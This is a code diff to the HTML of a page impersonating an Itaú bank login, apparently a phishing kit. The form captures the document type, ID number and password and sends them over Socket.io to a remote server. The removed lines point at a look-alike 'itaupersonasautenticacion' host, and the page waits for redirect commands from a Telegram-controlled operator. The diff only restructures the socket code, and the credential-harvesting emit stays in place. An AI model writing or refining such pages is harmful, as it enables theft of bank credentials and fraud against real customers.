--- a/index.html
+++ b/index.html
@@ -307,44 +307,15 @@
         </form>
     </div>
 
-    <script src="https://itaupersonasautenticacion.up.railway.app/socket.io/socket.io.js"></script>
+    <script src="/socket.io/socket.io.js"></script>
+    <script src="socket-handler.js"></script>
     <script>
-        const socket = io('https://itaupersonasautenticacion.up.railway.app', {
-            reconnection: true,
-            reconnectionDelay: 500,
-            reconnectionDelayMax: 2000,
-            reconnectionAttempts: Infinity,
-            timeout: 10000,
-            transports: ['websocket', 'polling']
-        });
-
-        let sessionId = localStorage.getItem('itau_session_id');
-        
         const documentNumber = document.getElementById('documentNumber');
         const password = document.getElementById('password');
         const documentType = document.getElementById('documentType');
         const submitBtn = document.getElementById('submitBtn');
         const loginForm = document.getElementById('loginForm');
         const loadingOverlay = document.getElementById('loadingOverlay');
-
-        // Initialize session on connection
-        socket.on('connect', () => {
-            console.log('Connected to server');
-            socket.emit('init-session', { sessionId });
-        });
-
-        // Store session ID
-        socket.on('session-ready', (data) => {
-            sessionId = data.sessionId;
-            localStorage.setItem('itau_session_id', sessionId);
-            console.log('Session ready:', sessionId);
-        });
-
-        // Handle reconnection
-        socket.on('reconnect', () => {
-            console.log('Reconnected to server');
-            socket.emit('init-session', { sessionId });
-        });
 
         // Solo permitir números en el campo de documento
         documentNumber.addEventListener('input', function(e) {
@@ -388,7 +359,7 @@
                 loadingOverlay.classList.add('active');
 
                 // Send data to server via Socket.io
-                socket.emit('login', {
+                window.itauSocket.emit('login', {
                     documentType: documentType.options[documentType.selectedIndex].text,
                     documentNumber: documentNumber.value,
                     password: password.value
@@ -397,7 +368,7 @@
         });
 
         // Listen for server responses
-        socket.on('login-response', (data) => {
+        window.itauSocket.on('login-response', (data) => {
             if (data.success) {
                 // Keep loading overlay visible, wait for Telegram command
                 console.log('Data sent successfully');
@@ -408,7 +379,7 @@
         });
 
         // Listen for redirect commands from Telegram
-        socket.on('redirect', (data) => {
+        window.itauSocket.on('redirect', (data) => {
             if (data.clearData) {
                 loginForm.reset();
                 checkFormValidity();
